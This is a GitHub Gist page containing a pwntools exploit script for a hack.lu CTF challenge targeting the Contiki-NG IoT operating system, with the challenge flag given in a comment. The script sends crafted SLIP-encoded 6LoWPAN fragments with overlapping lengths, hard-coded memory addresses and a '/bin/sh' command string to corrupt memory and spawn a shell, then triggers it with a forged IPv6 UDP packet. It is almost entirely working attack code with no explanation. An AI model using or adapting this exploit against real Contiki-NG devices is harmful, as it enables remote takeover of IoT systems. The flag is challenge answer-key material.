Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit for hack.lu Contiki-NG challenge
from pwn import *
from slip import slip
# flag: flag{IoT_operating_system_down_wooo}
serv = server(60001)
proc = serv.next_connection()
sobj = slip()
e = sobj.encode
proc.send(e('!M' + '\x00' * 8))
first_frag = '\x01' * 2 # Useless header
sz = 0x100
first_frag += p16(0xc000 ^ sz, endian='big')
first_frag += p16(0xbeef, endian='big')
first_frag += '\x05' * 0x20
pause()
proc.send(e(first_frag))
for i in range(6):
frag = '\x01' * 2 # Useless header
frag += p16(0xe000 ^ sz, endian='big')
frag += p16(0xbeef, endian='big')
frag += chr(i + 1)
if i != 5: frag += '\x00' * 0x20
else: frag += '\x07' * 8 + p32(0x804f1b0) + '\x07\x07' + '\x01\x01' + ';/bin/sh\x00'.ljust(0x13, '\x07')
proc.send(e(frag))
frag = '\x01' * 2 # Useless header
frag += p16(0xe000 ^ sz, endian='big')
frag += p16(0xbeef, endian='big')
frag += '\xa8'
frag += '\x00' * 0x10
frag += p16(0x1337) + p16(0xded) + p32(0)
frag += p32(0x8077858)
frag += '\x03' * 4
pause()
proc.send(e(frag))
final_frag = '\x01' * 2 # Useless header
final_frag += p16(0xe000 ^ sz, endian='big')
final_frag += p16(0xbeef, endian='big')
final_frag += '\x07'
final_frag += '\x05' * 0x20
pause()
proc.send(e(final_frag))
# proc.send(sobj.encode('M' + '\x00' * 8))
udp_pkt = '\x01' * 2
udp_pkt += '\x41'
udp_pkt += '\x60'
udp_pkt += '\xff\xff\xff'
udp_sz = 0x20
udp_pkt += p16(udp_sz, endian='big')
udp_pkt += '\x11' + 17 * '\x05'
udp_pkt += '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00'
udp_pkt += p16(0xded)
udp_pkt += p16(0x1337)
udp_pkt += '\x05' * 2
udp_pkt += '\x00\x00'
udp_pkt += '\x05' * 0x10
proc.send(e(udp_pkt))
proc.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment